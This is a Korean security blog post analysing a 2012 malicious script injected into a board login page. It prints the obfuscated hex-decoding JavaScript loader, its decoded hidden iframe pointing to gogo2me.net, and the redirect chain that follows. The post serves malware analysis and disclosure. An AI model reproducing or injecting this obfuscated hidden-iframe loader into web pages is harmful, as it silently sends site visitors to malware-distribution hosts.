본문 바로가기
security/악성코드 유포

[JS/Obfuscated.HN] http://insaweb9.cafe24.com/bbs/login.php?id=best 악성 스크립트 유포 정리 !

Kwan's 2012. 8. 11. 11:09

발견 위치 : hxxp://insaweb9.cafe24.com/bbs/login.php?id=best


[악성 스크립트]


 function c102916999516m4943389011261(m4943389011648)

 {

   function m4943389011a31()

   {

     var m4943389011e19=16;

     return m4943389011e19;

   }

   return (parseInt(m4943389011648,m4943389011a31()));

 }

 function m49433890125ea(m49433890129d2)

 {

   var m4943389013589=2;

   var m4943389012dba='';

   m4943389014143=String.fromCharCode;

   for(m49433890131a2=0;m49433890131a2<m49433890129d2.length;m49433890131a2+=m4943389013589)

   {

     m4943389012dba+=(m4943389014143(c102916999516m4943389011261(m49433890129d2.substr(m49433890131a2,m4943389013589))));

   }

   return m4943389012dba;

 }

 var z89='';

 var m4943389014917='3C7'+z89+'3637'+z89+'2697'+z89+'07'+z89+'43E696628216D7'+z89+'96961297'+z8[중략]';

document.write(m49433890125ea(m4943389014917))


[디코딩]


---------------------------

웹 페이지의 메시지

---------------------------

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61[중략]%65%3e'));}var myia=true;</script>

---------------------------

확인   

---------------------------


[HEX 디코딩]


<script>if(!myia){document.write(unescape( '<iframe name=c10 src='hXXp://gogo2me.net/.go/check.html?'+Math.round(Math.random()*441780)+'53ebedca2' width=796 height=555 style='display: none'></iframe>'));}var myia=true;</script>


[링크 정리]


최초 페이지 : hxxp://insaweb9.cafe24.com/bbs/login.php?id=best

iframe 연결 : hxxp://gogo2me.net/.go/check.html?

frame 연결 : hxxp://ww1.gogo2me.net

최종 연결 : hxxp://dsparking.com/?epl=BuMcp4amXBdAWsCMnIJ0Z4C2x48RJBROkdzFv8QqzkJ4Ay1CXlxfQ6mi61vN0pPAoOmoXXBgdmlh6Kicts9kZcc0IhH9Vq6Gtobv5oNuGaFAFOK6wEvwlRCIYioJpGfY9zPLjIhnGiFIJ2eWQ8ruVVzYpcOFgqBaZ5r975LUC4SpplPK4OQBu9zgFyDHBgMK6glEw1kwqCot4FuQc67dqY1xmsphQpFN5T73rcKLa0f5wXH3m1H-yQ4BxYYmEkVIc9ocXX2MFxjYFlmSTLGs7d863edJt4Xr6E7PcBlwb6z67kPP1cfgtBAuo-KlChGDjZMx9m2rLj97RSSSkjTj43wKfbaH8Uq-DD3UrmIZKAjSGDqjUueK1pbNkCdH-B2oSs5TQl45ngI8oFxUs-WJXFoTnCn8MPuS4TAaUI8GqAcyDQDUo5Ge9FBPmZ7aFE9FAIB6IKMB6dGoJz31QKb6SU95oMmUpyKUUT-lR6ZN9YNGeoIpHo1qTzUNPfVTI9J7qpn0VNEsLQEw8P__v_D__7_y_wMAAECAXw8AANoeP0ZZUyZZQTE2aFpClAEAAPA


hxxp://ww1.gogo2me.net?epl=Up_MRQiLp0w607k_C8ICdwDLC8kfEgqnSO7iRrI_BtcJeODFzQ-jZnaN67qWUo1O8zsWeCBxWS_adJTTtpsoiD55i0SVyKgwITinR5GwBulQgTiGXwppNtIRtmLj3tJv_BrvV0IQN0L51Aoyhr_9YAK-E115DY09ZgVSM6499eXEPnyiMn7DYN0SZ9c8WImC3STQbi3pe1VjdwCL8Uo6CvfV6xFjJk0-ETP50EiGwQKsRgWbySVlcjpwttDVpv7seO49LtPh9oBcg3M9ihhVJTVe3XBLfe9ShwhI4V4UxTHu-Z_kOUxbmI2ytetLI1t-o412qJYgmGFxsZ1TBHKDd4fAIGQxWQxYbXBhxtJ1uU07PxomPJgwqWydab3L8vO8AxC-sCxlMmKaaUoPU5t6apjQJrUR06b01KaYplH_VAU01KapBzSNpiGASU8w0UzANE2mIgaaJhMAAKYJEyYAE2DCHBMWATDw__-_8P__v_L_AwAAQIDfDAAAWF5I_llTJllBMTZoWkJqAQAA8A


최종 연결지는 현재 접속이 안되고 있습니다 !

=========================
Server IP(s):
0.0.0.0
=========================


저작자표시 비영리 변경금지

'security > 악성코드 유포' 카테고리의 다른 글

http://www.inews24.com 악성코드 유포중 !  (0) 2012.09.01
인제대학교 일어일문학과 http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main 악성 코드 유포중 !  (0) 2012.08.25
악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 !  (0) 2012.06.30
inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 !  (0) 2012.06.29
오랜만에 풀어본 난독화 스크립트!  (0) 2012.06.29

'security/악성코드 유포' Related Articles

티스토리툴바